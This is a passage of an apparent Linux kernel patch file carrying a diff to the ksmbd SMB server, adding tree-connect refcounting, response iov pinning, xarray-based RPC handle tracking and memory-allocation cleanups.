+ config SMB_SERVER_SMBDIRECT
+ 	bool "Support for SMB Direct protocol"
+@@ -54,6 +56,8 @@ config SMB_SERVER_SMBDIRECT
+ 	  SMB Direct allows transferring SMB packets over RDMA. If unsure,
+ 	  say N.
+ 
++endif
++
+ config SMB_SERVER_CHECK_CAP_NET_ADMIN
+ 	bool "Enable check network administration capability"
+ 	depends on SMB_SERVER
+diff --git a/fs/smb/server/asn1.c b/fs/smb/server/asn1.c
+index c03eba0903682..4a4b2b03ff33d 100644
+--- a/fs/smb/server/asn1.c
++++ b/fs/smb/server/asn1.c
+@@ -208,32 +208,29 @@ int ksmbd_neg_token_init_mech_type(void *context, size_t hdrlen,
+ 	return 0;
+ }
+ 
+-int ksmbd_neg_token_init_mech_token(void *context, size_t hdrlen,
+-				    unsigned char tag, const void *value,
+-				    size_t vlen)
++static int ksmbd_neg_token_alloc(void *context, size_t hdrlen,
++				 unsigned char tag, const void *value,
++				 size_t vlen)
+ {
+ 	struct ksmbd_conn *conn = context;
+ 
+-	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
++	conn->mechToken = kmemdup_nul(value, vlen, GFP_KERNEL);
+ 	if (!conn->mechToken)
+ 		return -ENOMEM;
+ 
+-	memcpy(conn->mechToken, value, vlen);
+-	conn->mechToken[vlen] = '\0';
+ 	return 0;
+ }
+ 
+-int ksmbd_neg_token_targ_resp_token(void *context, size_t hdrlen,
++int ksmbd_neg_token_init_mech_token(void *context, size_t hdrlen,
+ 				    unsigned char tag, const void *value,
+ 				    size_t vlen)
+ {
+-	struct ksmbd_conn *conn = context;
+-
+-	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
+-	if (!conn->mechToken)
+-		return -ENOMEM;
++	return ksmbd_neg_token_alloc(context, hdrlen, tag, value, vlen);
++}
+ 
+-	memcpy(conn->mechToken, value, vlen);
+-	conn->mechToken[vlen] = '\0';
+-	return 0;
++int ksmbd_neg_token_targ_resp_token(void *context, size_t hdrlen,
++				    unsigned char tag, const void *value,
++				    size_t vlen)
++{
++	return ksmbd_neg_token_alloc(context, hdrlen, tag, value, vlen);
+ }
+diff --git a/fs/smb/server/auth.c b/fs/smb/server/auth.c
+index 15e5684e328c1..229a6527870d0 100644
+--- a/fs/smb/server/auth.c
++++ b/fs/smb/server/auth.c
+@@ -1032,11 +1032,15 @@ static struct scatterlist *ksmbd_init_sg(struct kvec *iov, unsigned int nvec,
+ {
+ 	struct scatterlist *sg;
+ 	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
+-	int i, nr_entries[3] = {0}, total_entries = 0, sg_idx = 0;
++	int i, *nr_entries, total_entries = 0, sg_idx = 0;
+ 
+ 	if (!nvec)
+ 		return NULL;
+ 
++	nr_entries = kcalloc(nvec, sizeof(int), GFP_KERNEL);
++	if (!nr_entries)
++		return NULL;
++
+ 	for (i = 0; i < nvec - 1; i++) {
+ 		unsigned long kaddr = (unsigned long)iov[i + 1].iov_base;
+ 
+@@ -1054,8 +1058,10 @@ static struct scatterlist *ksmbd_init_sg(struct kvec *iov, unsigned int nvec,
+ 	total_entries += 2;
+ 
+ 	sg = kmalloc_array(total_entries, sizeof(struct scatterlist), GFP_KERNEL);
+-	if (!sg)
++	if (!sg) {
++		kfree(nr_entries);
+ 		return NULL;
++	}
+ 
+ 	sg_init_table(sg, total_entries);
+ 	smb2_sg_set_buf(&sg[sg_idx++], iov[0].iov_base + 24, assoc_data_len);
+@@ -1089,6 +1095,7 @@ static struct scatterlist *ksmbd_init_sg(struct kvec *iov, unsigned int nvec,
+ 		}
+ 	}
+ 	smb2_sg_set_buf(&sg[sg_idx], sign, SMB2_SIGNATURE_SIZE);
++	kfree(nr_entries);
+ 	return sg;
+ }
+ 
+diff --git a/fs/smb/server/connection.c b/fs/smb/server/connection.c
+index ff97cad8d5b45..b6fa1e285c401 100644
+--- a/fs/smb/server/connection.c
++++ b/fs/smb/server/connection.c
+@@ -114,10 +114,8 @@ void ksmbd_conn_enqueue_request(struct ksmbd_work *work)
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct list_head *requests_queue = NULL;
+ 
+-	if (conn->ops->get_cmd_val(work) != SMB2_CANCEL_HE) {
++	if (conn->ops->get_cmd_val(work) != SMB2_CANCEL_HE)
+ 		requests_queue = &conn->requests;
+-		work->syncronous = true;
+-	}
+ 
+ 	if (requests_queue) {
+ 		atomic_inc(&conn->req_running);
+@@ -127,28 +125,22 @@ void ksmbd_conn_enqueue_request(struct ksmbd_work *work)
+ 	}
+ }
+ 
+-int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
++void ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	int ret = 1;
+ 
+ 	if (list_empty(&work->request_entry) &&
+ 	    list_empty(&work->async_request_entry))
+-		return 0;
++		return;
+ 
+-	if (!work->multiRsp)
+-		atomic_dec(&conn->req_running);
++	atomic_dec(&conn->req_running);
+ 	spin_lock(&conn->request_lock);
+-	if (!work->multiRsp) {
+-		list_del_init(&work->request_entry);
+-		if (work->syncronous == false)
+-			list_del_init(&work->async_request_entry);
+-		ret = 0;
+-	}
++	list_del_init(&work->request_entry);
+ 	spin_unlock(&conn->request_lock);
++	if (work->asynchronous)
++		release_async_work(work);
+ 
+ 	wake_up_all(&conn->req_running_q);
+-	return ret;
+ }
+ 
+ void ksmbd_conn_lock(struct ksmbd_conn *conn)
+@@ -175,63 +167,31 @@ void ksmbd_all_conn_set_status(u64 sess_id, u32 status)
+ 
+ void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id)
+ {
+-	struct ksmbd_conn *bind_conn;
+-
+ 	wait_event(conn->req_running_q, atomic_read(&conn->req_running) < 2);
+-
+-	down_read(&conn_list_lock);
+-	list_for_each_entry(bind_conn, &conn_list, conns_list) {
+-		if (bind_conn == conn)
+-			continue;
+-
+-		if ((bind_conn->binding || xa_load(&bind_conn->sessions, sess_id)) &&
+-		    !ksmbd_conn_releasing(bind_conn) &&
+-		    atomic_read(&bind_conn->req_running)) {
+-			wait_event(bind_conn->req_running_q,
+-				atomic_read(&bind_conn->req_running) == 0);
+-		}
+-	}
+-	up_read(&conn_list_lock);
+ }
+ 
+ int ksmbd_conn_write(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	size_t len = 0;
+ 	int sent;
+-	struct kvec iov[3];
+-	int iov_idx = 0;
+ 
+ 	if (!work->response_buf) {
+ 		pr_err("NULL response header\n");
+ 		return -EINVAL;
+ 	}
+ 
+-	if (work->tr_buf) {
+-		iov[iov_idx] = (struct kvec) { work->tr_buf,
+-				sizeof(struct smb2_transform_hdr) + 4 };
+-		len += iov[iov_idx++].iov_len;
+-	}
++	if (work->send_no_response)
++		return 0;
+ 
+-	if (work->aux_payload_sz) {
+-		iov[iov_idx] = (struct kvec) { work->response_buf, work->resp_hdr_sz };
+-		len += iov[iov_idx++].iov_len;
+-		iov[iov_idx] = (struct kvec) { work->aux_payload_buf, work->aux_payload_sz };
+-		len += iov[iov_idx++].iov_len;
+-	} else {
+-		if (work->tr_buf)
+-			iov[iov_idx].iov_len = work->resp_hdr_sz;
+-		else
+-			iov[iov_idx].iov_len = get_rfc1002_len(work->response_buf) + 4;
+-		iov[iov_idx].iov_base = work->response_buf;
+-		len += iov[iov_idx++].iov_len;
+-	}
++	if (!work->iov_idx)
++		return -EINVAL;
+ 
+ 	ksmbd_conn_lock(conn);
+-	sent = conn->transport->ops->writev(conn->transport, &iov[0],
+-					iov_idx, len,
+-					work->need_invalidate_rkey,
+-					work->remote_key);
++	sent = conn->transport->ops->writev(conn->transport, work->iov,
++			work->iov_cnt,
++			get_rfc1002_len(work->iov[0].iov_base) + 4,
++			work->need_invalidate_rkey,
++			work->remote_key);
+ 	ksmbd_conn_unlock(conn);
+ 
+ 	if (sent < 0) {
+@@ -345,7 +305,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 			max_allowed_pdu_size = SMB3_MAX_MSGSIZE;
+ 
+ 		if (pdu_size > max_allowed_pdu_size) {
+-			pr_err_ratelimited("PDU length(%u) excceed maximum allowed pdu size(%u) on connection(%d)\n",
++			pr_err_ratelimited("PDU length(%u) exceeded maximum allowed pdu size(%u) on connection(%d)\n",
+ 					pdu_size, max_allowed_pdu_size,
+ 					READ_ONCE(conn->status));
+ 			break;
+diff --git a/fs/smb/server/connection.h b/fs/smb/server/connection.h
+index 335fdd714d595..3c005246a32e8 100644
+--- a/fs/smb/server/connection.h
++++ b/fs/smb/server/connection.h
+@@ -159,7 +159,7 @@ int ksmbd_conn_rdma_write(struct ksmbd_conn *conn,
+ 			  struct smb2_buffer_desc_v1 *desc,
+ 			  unsigned int desc_len);
+ void ksmbd_conn_enqueue_request(struct ksmbd_work *work);
+-int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work);
++void ksmbd_conn_try_dequeue_request(struct ksmbd_work *work);
+ void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops);
+ int ksmbd_conn_handler_loop(void *p);
+ int ksmbd_conn_transport_init(void);
+diff --git a/fs/smb/server/ksmbd_netlink.h b/fs/smb/server/ksmbd_netlink.h
+index ce866ff159bfe..b7521e41402e0 100644
+--- a/fs/smb/server/ksmbd_netlink.h
++++ b/fs/smb/server/ksmbd_netlink.h
+@@ -74,6 +74,7 @@ struct ksmbd_heartbeat {
+ #define KSMBD_GLOBAL_FLAG_SMB2_LEASES		BIT(0)
+ #define KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION	BIT(1)
+ #define KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL	BIT(2)
++#define KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF	BIT(3)
+ 
+ /*
+  * IPC request for ksmbd server startup
+@@ -351,7 +352,8 @@ enum KSMBD_TREE_CONN_STATUS {
+ #define KSMBD_SHARE_FLAG_STREAMS		BIT(11)
+ #define KSMBD_SHARE_FLAG_FOLLOW_SYMLINKS	BIT(12)
+ #define KSMBD_SHARE_FLAG_ACL_XATTR		BIT(13)
+-#define KSMBD_SHARE_FLAG_UPDATE		BIT(14)
++#define KSMBD_SHARE_FLAG_UPDATE			BIT(14)
++#define KSMBD_SHARE_FLAG_CROSSMNT		BIT(15)
+ 
+ /*
+  * Tree connect request flags.
+diff --git a/fs/smb/server/ksmbd_work.c b/fs/smb/server/ksmbd_work.c
+index 14b9caebf7a4f..d7c676c151e20 100644
+--- a/fs/smb/server/ksmbd_work.c
++++ b/fs/smb/server/ksmbd_work.c
+@@ -27,18 +27,38 @@ struct ksmbd_work *ksmbd_alloc_work_struct(void)
+ 		INIT_LIST_HEAD(&work->async_request_entry);
+ 		INIT_LIST_HEAD(&work->fp_entry);
+ 		INIT_LIST_HEAD(&work->interim_entry);
++		INIT_LIST_HEAD(&work->aux_read_list);
++		work->iov_alloc_cnt = 4;
++		work->iov = kcalloc(work->iov_alloc_cnt, sizeof(struct kvec),
++				    GFP_KERNEL);
++		if (!work->iov) {
++			kmem_cache_free(work_cache, work);
++			work = NULL;
++		}
+ 	}
+ 	return work;
+ }
+ 
+ void ksmbd_free_work_struct(struct ksmbd_work *work)
+ {
++	struct aux_read *ar, *tmp;
++
+ 	WARN_ON(work->saved_cred != NULL);
+ 
+ 	kvfree(work->response_buf);
+-	kvfree(work->aux_payload_buf);
++
++	list_for_each_entry_safe(ar, tmp, &work->aux_read_list, entry) {
++		kvfree(ar->buf);
++		list_del(&ar->entry);
++		kfree(ar);
++	}
++
+ 	kfree(work->tr_buf);
+ 	kvfree(work->request_buf);
++	kfree(work->iov);
++	if (!list_empty(&work->interim_entry))
++		list_del(&work->interim_entry);
++
+ 	if (work->async_id)
+ 		ksmbd_release_id(&work->conn->async_ida, work->async_id);
+ 	kmem_cache_free(work_cache, work);
+@@ -77,3 +97,81 @@ bool ksmbd_queue_work(struct ksmbd_work *work)
+ {
+ 	return queue_work(ksmbd_wq, &work->work);
+ }
++
++static inline void __ksmbd_iov_pin(struct ksmbd_work *work, void *ib,
++				   unsigned int ib_len)
++{
++	work->iov[++work->iov_idx].iov_base = ib;
++	work->iov[work->iov_idx].iov_len = ib_len;
++	work->iov_cnt++;
++}
++
++static int __ksmbd_iov_pin_rsp(struct ksmbd_work *work, void *ib, int len,
++			       void *aux_buf, unsigned int aux_size)
++{
++	struct aux_read *ar = NULL;
++	int need_iov_cnt = 1;
++
++	if (aux_size) {
++		need_iov_cnt++;
++		ar = kmalloc(sizeof(struct aux_read), GFP_KERNEL);
++		if (!ar)
++			return -ENOMEM;
++	}
++
++	if (work->iov_alloc_cnt < work->iov_cnt + need_iov_cnt) {
++		struct kvec *new;
++
++		work->iov_alloc_cnt += 4;
++		new = krealloc(work->iov,
++			       sizeof(struct kvec) * work->iov_alloc_cnt,
++			       GFP_KERNEL | __GFP_ZERO);
++		if (!new) {
++			kfree(ar);
++			work->iov_alloc_cnt -= 4;
++			return -ENOMEM;
++		}
++		work->iov = new;
++	}
++
++	/* Plus rfc_length size on first iov */
++	if (!work->iov_idx) {
++		work->iov[work->iov_idx].iov_base = work->response_buf;
++		*(__be32 *)work->iov[0].iov_base = 0;
++		work->iov[work->iov_idx].iov_len = 4;
++		work->iov_cnt++;
++	}
++
++	__ksmbd_iov_pin(work, ib, len);
++	inc_rfc1001_len(work->iov[0].iov_base, len);
++
++	if (aux_size) {
++		__ksmbd_iov_pin(work, aux_buf, aux_size);
++		inc_rfc1001_len(work->iov[0].iov_base, aux_size);
++
++		ar->buf = aux_buf;
++		list_add(&ar->entry, &work->aux_read_list);
++	}
++
++	return 0;
++}
++
++int ksmbd_iov_pin_rsp(struct ksmbd_work *work, void *ib, int len)
++{
++	return __ksmbd_iov_pin_rsp(work, ib, len, NULL, 0);
++}
++
++int ksmbd_iov_pin_rsp_read(struct ksmbd_work *work, void *ib, int len,
++			   void *aux_buf, unsigned int aux_size)
++{
++	return __ksmbd_iov_pin_rsp(work, ib, len, aux_buf, aux_size);
++}
++
++int allocate_interim_rsp_buf(struct ksmbd_work *work)
++{
++	work->response_buf = kzalloc(MAX_CIFS_SMALL_BUFFER_SIZE, GFP_KERNEL);
++	if (!work->response_buf)
++		return -ENOMEM;
++	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++	return 0;
++}
+diff --git a/fs/smb/server/ksmbd_work.h b/fs/smb/server/ksmbd_work.h
+index 5ece58e40c979..8ca2c813246e6 100644
+--- a/fs/smb/server/ksmbd_work.h
++++ b/fs/smb/server/ksmbd_work.h
+@@ -19,6 +19,11 @@ enum {
+ 	KSMBD_WORK_CLOSED,
+ };
+ 
++struct aux_read {
++	void *buf;
++	struct list_head entry;
++};
++
+ /* one of these for every pending CIFS request at the connection */
+ struct ksmbd_work {
+ 	/* Server corresponding to this mid */
+@@ -31,13 +36,19 @@ struct ksmbd_work {
+ 	/* Response buffer */
+ 	void                            *response_buf;
+ 
+-	/* Read data buffer */
+-	void                            *aux_payload_buf;
++	struct list_head		aux_read_list;
++
++	struct kvec			*iov;
++	int				iov_alloc_cnt;
++	int				iov_cnt;
++	int				iov_idx;
+ 
+ 	/* Next cmd hdr in compound req buf*/
+ 	int                             next_smb2_rcv_hdr_off;
+ 	/* Next cmd hdr in compound rsp buf*/
+ 	int                             next_smb2_rsp_hdr_off;
++	/* Current cmd hdr in compound rsp buf*/
++	int                             curr_smb2_rsp_hdr_off;
+ 
+ 	/*
+ 	 * Current Local FID assigned compound response if SMB2 CREATE
+@@ -53,22 +64,17 @@ struct ksmbd_work {
+ 	unsigned int			credits_granted;
+ 
+ 	/* response smb header size */
+-	unsigned int                    resp_hdr_sz;
+ 	unsigned int                    response_sz;
+-	/* Read data count */
+-	unsigned int                    aux_payload_sz;
+ 
+ 	void				*tr_buf;
+ 
+ 	unsigned char			state;
+-	/* Multiple responses for one request e.g. SMB ECHO */
+-	bool                            multiRsp:1;
+ 	/* No response for cancelled request */
+ 	bool                            send_no_response:1;
+ 	/* Request is encrypted */
+ 	bool                            encrypted:1;
+ 	/* Is this SYNC or ASYNC ksmbd_work */
+-	bool                            syncronous:1;
++	bool                            asynchronous:1;
+ 	bool                            need_invalidate_rkey:1;
+ 
+ 	unsigned int                    remote_key;
+@@ -95,6 +101,15 @@ static inline void *ksmbd_resp_buf_next(struct ksmbd_work *work)
+ 	return work->response_buf + work->next_smb2_rsp_hdr_off + 4;
+ }
+ 
++/**
++ * ksmbd_resp_buf_curr - Get current buffer on compound response.
++ * @work: smb work containing response buffer
++ */
++static inline void *ksmbd_resp_buf_curr(struct ksmbd_work *work)
++{
++	return work->response_buf + work->curr_smb2_rsp_hdr_off + 4;
++}
++
+ /**
+  * ksmbd_req_buf_next - Get next buffer on compound request.
+  * @work: smb work containing response buffer
+@@ -113,5 +128,8 @@ int ksmbd_work_pool_init(void);
+ int ksmbd_workqueue_init(void);
+ void ksmbd_workqueue_destroy(void);
+ bool ksmbd_queue_work(struct ksmbd_work *work);
+-
++int ksmbd_iov_pin_rsp_read(struct ksmbd_work *work, void *ib, int len,
++			   void *aux_buf, unsigned int aux_size);
++int ksmbd_iov_pin_rsp(struct ksmbd_work *work, void *ib, int len);
++int allocate_interim_rsp_buf(struct ksmbd_work *work);
+ #endif /* __KSMBD_WORK_H__ */
+diff --git a/fs/smb/server/mgmt/share_config.h b/fs/smb/server/mgmt/share_config.h
+index 3fd3382939421..5f591751b9236 100644
+--- a/fs/smb/server/mgmt/share_config.h
++++ b/fs/smb/server/mgmt/share_config.h
+@@ -34,29 +34,22 @@ struct ksmbd_share_config {
+ #define KSMBD_SHARE_INVALID_UID	((__u16)-1)
+ #define KSMBD_SHARE_INVALID_GID	((__u16)-1)
+ 
+-static inline int share_config_create_mode(struct ksmbd_share_config *share,
+-					   umode_t posix_mode)
++static inline umode_t
++share_config_create_mode(struct ksmbd_share_config *share,
++			 umode_t posix_mode)
+ {
+-	if (!share->force_create_mode) {
+-		if (!posix_mode)
+-			return share->create_mask;
+-		else
+-			return posix_mode & share->create_mask;
+-	}
+-	return share->force_create_mode & share->create_mask;
++	umode_t mode = (posix_mode ?: (umode_t)-1) & share->create_mask;
++
++	return mode | share->force_create_mode;
+ }
+ 
+-static inline int share_config_directory_mode(struct ksmbd_share_config *share,
+-					      umode_t posix_mode)
++static inline umode_t
++share_config_directory_mode(struct ksmbd_share_config *share,
++			    umode_t posix_mode)
+ {
+-	if (!share->force_directory_mode) {
+-		if (!posix_mode)
+-			return share->directory_mask;
+-		else
+-			return posix_mode & share->directory_mask;
+-	}
++	umode_t mode = (posix_mode ?: (umode_t)-1) & share->directory_mask;
+ 
+-	return share->force_directory_mode & share->directory_mask;
++	return mode | share->force_directory_mode;
+ }
+ 
+ static inline int test_share_config_flag(struct ksmbd_share_config *share,
+diff --git a/fs/smb/server/mgmt/tree_connect.c b/fs/smb/server/mgmt/tree_connect.c
+index f07a05f376513..d2c81a8a11dda 100644
+--- a/fs/smb/server/mgmt/tree_connect.c
++++ b/fs/smb/server/mgmt/tree_connect.c
+@@ -73,7 +73,10 @@ ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 
+ 	tree_conn->user = sess->user;
+ 	tree_conn->share_conf = sc;
++	tree_conn->t_state = TREE_NEW;
+ 	status.tree_conn = tree_conn;
++	atomic_set(&tree_conn->refcount, 1);
++	init_waitqueue_head(&tree_conn->refcount_q);
+ 
+ 	ret = xa_err(xa_store(&sess->tree_conns, tree_conn->id, tree_conn,
+ 			      GFP_KERNEL));
+@@ -93,14 +96,33 @@ out_error:
+ 	return status;
+ }
+ 
++void ksmbd_tree_connect_put(struct ksmbd_tree_connect *tcon)
++{
++	/*
++	 * Checking waitqueue to releasing tree connect on
++	 * tree disconnect. waitqueue_active is safe because it
++	 * uses atomic operation for condition.
++	 */
++	if (!atomic_dec_return(&tcon->refcount) &&
++	    waitqueue_active(&tcon->refcount_q))
++		wake_up(&tcon->refcount_q);
++}
++
+ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+ 			       struct ksmbd_tree_connect *tree_conn)
+ {
+ 	int ret;
+ 
++	write_lock(&sess->tree_conns_lock);
++	xa_erase(&sess->tree_conns, tree_conn->id);
++	write_unlock(&sess->tree_conns_lock);
++
++	if (!atomic_dec_and_test(&tree_conn->refcount))
++		wait_event(tree_conn->refcount_q,
++			   atomic_read(&tree_conn->refcount) == 0);
++
+ 	ret = ksmbd_ipc_tree_disconnect_request(sess->id, tree_conn->id);
+ 	ksmbd_release_tree_conn_id(sess, tree_conn->id);
+-	xa_erase(&sess->tree_conns, tree_conn->id);
+ 	ksmbd_share_config_put(tree_conn->share_conf);
+ 	kfree(tree_conn);
+ 	return ret;
+@@ -111,26 +133,19 @@ struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+ {
+ 	struct ksmbd_tree_connect *tcon;
+ 
++	read_lock(&sess->tree_conns_lock);
+ 	tcon = xa_load(&sess->tree_conns, id);
+ 	if (tcon) {
+-		if (test_bit(TREE_CONN_EXPIRE, &tcon->status))
++		if (tcon->t_state != TREE_CONNECTED)
++			tcon = NULL;
++		else if (!atomic_inc_not_zero(&tcon->refcount))
+ 			tcon = NULL;
+ 	}
++	read_unlock(&sess->tree_conns_lock);
+ 
+ 	return tcon;
+ }
+ 
+-struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+-						 unsigned int id)
+-{
+-	struct ksmbd_tree_connect *tc;
+-
+-	tc = ksmbd_tree_conn_lookup(sess, id);
+-	if (tc)
+-		return tc->share_conf;
+-	return NULL;
+-}
+-
+ int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
+ {
+ 	int ret = 0;
+@@ -140,8 +155,18 @@ int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
+ 	if (!sess)
+ 		return -EINVAL;
+ 
+-	xa_for_each(&sess->tree_conns, id, tc)
++	xa_for_each(&sess->tree_conns, id, tc) {
++		write_lock(&sess->tree_conns_lock);
++		if (tc->t_state == TREE_DISCONNECTED) {
++			write_unlock(&sess->tree_conns_lock);
++			ret = -ENOENT;
++			continue;
++		}
++		tc->t_state = TREE_DISCONNECTED;
++		write_unlock(&sess->tree_conns_lock);
++
+ 		ret |= ksmbd_tree_conn_disconnect(sess, tc);
++	}
+ 	xa_destroy(&sess->tree_conns);
+ 	return ret;
+ }
+diff --git a/fs/smb/server/mgmt/tree_connect.h b/fs/smb/server/mgmt/tree_connect.h
+index 700df36cf3e30..6377a70b811c8 100644
+--- a/fs/smb/server/mgmt/tree_connect.h
++++ b/fs/smb/server/mgmt/tree_connect.h
+@@ -14,7 +14,11 @@ struct ksmbd_share_config;
+ struct ksmbd_user;
+ struct ksmbd_conn;
+ 
+-#define TREE_CONN_EXPIRE		1
++enum {
++	TREE_NEW = 0,
++	TREE_CONNECTED,
++	TREE_DISCONNECTED
++};
+ 
+ struct ksmbd_tree_connect {
+ 	int				id;
+@@ -27,7 +31,9 @@ struct ksmbd_tree_connect {
+ 
+ 	int				maximal_access;
+ 	bool				posix_extensions;
+-	unsigned long			status;
++	atomic_t			refcount;
++	wait_queue_head_t		refcount_q;
++	unsigned int			t_state;
+ };
+ 
+ struct ksmbd_tree_conn_status {
+@@ -46,6 +52,7 @@ struct ksmbd_session;
+ struct ksmbd_tree_conn_status
+ ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 			const char *share_name);
++void ksmbd_tree_connect_put(struct ksmbd_tree_connect *tcon);
+ 
+ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+ 			       struct ksmbd_tree_connect *tree_conn);
+@@ -53,9 +60,6 @@ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+ struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+ 						  unsigned int id);
+ 
+-struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+-						 unsigned int id);
+-
+ int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess);
+ 
+ #endif /* __TREE_CONNECT_MANAGEMENT_H__ */
+diff --git a/fs/smb/server/mgmt/user_config.h b/fs/smb/server/mgmt/user_config.h
+index 6a44109617f14..e068a19fd9049 100644
+--- a/fs/smb/server/mgmt/user_config.h
++++ b/fs/smb/server/mgmt/user_config.h
+@@ -18,7 +18,6 @@ struct ksmbd_user {
+ 
+ 	size_t			passkey_sz;
+ 	char			*passkey;
+-	unsigned int		failed_login_count;
+ };
+ 
+ static inline bool user_guest(struct ksmbd_user *user)
+diff --git a/fs/smb/server/mgmt/user_session.c b/fs/smb/server/mgmt/user_session.c
+index cf6621e21ba36..15f68ee050894 100644
+--- a/fs/smb/server/mgmt/user_session.c
++++ b/fs/smb/server/mgmt/user_session.c
+@@ -25,7 +25,6 @@ static DECLARE_RWSEM(sessions_table_lock);
+ struct ksmbd_session_rpc {
+ 	int			id;
+ 	unsigned int		method;
+-	struct list_head	list;
+ };
+ 
+ static void free_channel_list(struct ksmbd_session *sess)
+@@ -58,15 +57,14 @@ static void __session_rpc_close(struct ksmbd_session *sess,
+ static void ksmbd_session_rpc_clear_list(struct ksmbd_session *sess)
+ {
+ 	struct ksmbd_session_rpc *entry;
++	long index;
+ 
+-	while (!list_empty(&sess->rpc_handle_list)) {
+-		entry = list_entry(sess->rpc_handle_list.next,
+-				   struct ksmbd_session_rpc,
+-				   list);
+-
+-		list_del(&entry->list);
++	xa_for_each(&sess->rpc_handle_list, index, entry) {
++		xa_erase(&sess->rpc_handle_list, index);
+ 		__session_rpc_close(sess, entry);
+ 	}
++
++	xa_destroy(&sess->rpc_handle_list);
+ }
+ 
+ static int __rpc_method(char *rpc_name)
+@@ -102,13 +100,13 @@ int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name)
+ 
+ 	entry = kzalloc(sizeof(struct ksmbd_session_rpc), GFP_KERNEL);
+ 	if (!entry)
+-		return -EINVAL;
++		return -ENOMEM;
+ 
+-	list_add(&entry->list, &sess->rpc_handle_list);
+ 	entry->method = method;
+ 	entry->id = ksmbd_ipc_id_alloc();
+ 	if (entry->id < 0)
+ 		goto free_entry;
++	xa_store(&sess->rpc_handle_list, entry->id, entry, GFP_KERNEL);
+ 
+ 	resp = ksmbd_rpc_open(sess, entry->id);
+ 	if (!resp)
+@@ -117,9 +115,9 @@ int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name)
+ 	kvfree(resp);
+ 	return entry->id;
+ free_id:
++	xa_erase(&sess->rpc_handle_list, entry->id);
+ 	ksmbd_rpc_id_free(entry->id);
+ free_entry:
+-	list_del(&entry->list);
+ 	kfree(entry);
+ 	return -EINVAL;
+ }
+@@ -128,24 +126,17 @@ void ksmbd_session_rpc_close(struct ksmbd_session *sess, int id)
+ {
+ 	struct ksmbd_session_rpc *entry;
+ 
+-	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
+-		if (entry->id == id) {
+-			list_del(&entry->list);
+-			__session_rpc_close(sess, entry);
+-			break;
+-		}
+-	}
++	entry = xa_erase(&sess->rpc_handle_list, id);
++	if (entry)
++		__session_rpc_close(sess, entry);
+ }
+ 
+ int ksmbd_session_rpc_method(struct ksmbd_session *sess, int id)
+ {
+ 	struct ksmbd_session_rpc *entry;
+ 
+-	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
+-		if (entry->id == id)
+-			return entry->method;
+-	}
+-	return 0;
++	entry = xa_load(&sess->rpc_handle_list, id);
++	return entry ? entry->method : 0;
+ }
+ 
+ void ksmbd_session_destroy(struct ksmbd_session *sess)
+@@ -362,8 +353,9 @@ static struct ksmbd_session *__session_create(int protocol)
+ 	set_session_flag(sess, protocol);
+ 	xa_init(&sess->tree_conns);
+ 	xa_init(&sess->ksmbd_chann_list);
+-	INIT_LIST_HEAD(&sess->rpc_handle_list);
++	xa_init(&sess->rpc_handle_list);
+ 	sess->sequence_number = 1;
++	rwlock_init(&sess->tree_conns_lock);
+ 
+ 	ret = __init_smb2_session(sess);
+ 	if (ret)
+diff --git a/fs/smb/server/mgmt/user_session.h b/fs/smb/server/mgmt/user_session.h
+index 51f38e5b61abb..63cb08fffde84 100644
+--- a/fs/smb/server/mgmt/user_session.h
++++ b/fs/smb/server/mgmt/user_session.h
+@@ -52,7 +52,7 @@ struct ksmbd_session {
+ 	struct xarray			ksmbd_chann_list;
+ 	struct xarray			tree_conns;
+ 	struct ida			tree_conn_ida;
+-	struct list_head		rpc_handle_list;
++	struct xarray			rpc_handle_list;
+ 
+ 	__u8				smb3encryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+ 	__u8				smb3decryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+@@ -60,6 +60,7 @@ struct ksmbd_session {
+ 
+ 	struct ksmbd_file_table		file_table;
+ 	unsigned long			last_active;
++	rwlock_t			tree_conns_lock;
+ };
+ 
+ static inline int test_session_flag(struct ksmbd_session *sess, int bit)
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index c81aee9ce7ec4..af0f6914eca45 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -102,9 +102,10 @@ static int alloc_lease(struct oplock_info *opinfo, struct lease_ctx_info *lctx)
+ 	lease->new_state = 0;
+ 	lease->flags = lctx->flags;
+ 	lease->duration = lctx->duration;
++	lease->is_dir = lctx->is_dir;
+ 	memcpy(lease->parent_lease_key, lctx->parent_lease_key, SMB2_LEASE_KEY_SIZE);
+ 	lease->version = lctx->version;
+-	lease->epoch = 0;
++	lease->epoch = le16_to_cpu(lctx->epoch);
+ 	INIT_LIST_HEAD(&opinfo->lease_entry);
